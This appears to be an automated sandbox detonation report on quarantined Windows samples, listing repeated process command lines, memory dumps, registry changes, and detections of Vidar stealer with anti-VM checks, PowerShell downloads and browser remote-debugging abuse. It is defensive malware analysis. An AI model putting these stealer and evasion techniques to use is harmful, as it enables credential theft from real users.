"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
Network
Files
memory/2308-0-0x000000007412E000-0x000000007412F000-memory.dmp
memory/2308-1-0x0000000000230000-0x00000000003A0000-memory.dmp
memory/2308-3-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2308-4-0x000000007412E000-0x000000007412F000-memory.dmp
memory/2308-5-0x0000000074120000-0x000000007480E000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f025131ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A1C821-F499-11EF-869D-46BBF83CD43C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda00000000020000000000106600000001000020000000cefa62c8335a558080a6fd0982a941d7f1c005aef8791418c792a682ff6c6884000000000e80000000020000200000002b1e7bbe3e5baa2b4b451cb0050c86788db912c44a06550e62db50e858ba0b0120000000b6ec7b8e9858665f6f12bf0714231abc61e5f477e1d31a90f72ad07f8948a7744000000037577dd0e9a419bedbe25811b70e59c9ce1278b1e1a011925f334fdf91c11874d7660f99fdedcb5514d6bcb2d1f0dc2fa86d74fd3b635bcdc35e699eba6777e4 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda000000000200000000001066000000010000200000008362dff63c082eb17f07f6d7e1df8c91584938be5118afac7a53a0e4d2fccbce000000000e80000000020000200000008d326dfc9c4a76d5a623da573804795ab7bf658cc076937b264833433a3f23e990000000603cf3cd26ee1a9693952fac08a70514dece4aee0fa9a0e78337abededccf639dcd5db1435983b8a8a8c5b91a8a4ba449d4b696d98995b5616e85d58a0128fb7ba87b1fdb19856b97e105731bcc4bddd568cb562dccb2f9dc816a2b4bda981ffd9c5ac8662b64251f6c6a66c4ca6b7e298a0f3ced3a71296fc741c169217b4af23104de5422a9c36be9c9ff30b6ea60140000000ac3b5b6a3a806b8fa9c9eeb5b9a8281a799f7bea941808a45093a73219e514245a77b4170f05a358020d75bec4c47727ed0b0933a0fdd73dbf3ab61f95b99482 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2532 wrote to memory of 2312 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
Analysis: behavioral14
Detonation Overview
| Submitted | 2025-02-26 23:27 |
| Reported | 2025-02-26 23:28 |
| Platform | win10v2004-20250217-en |
| Max time kernel | 34s |
| Max time network | 36s |
Command Line
Signatures
Detect Vidar Stealer
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
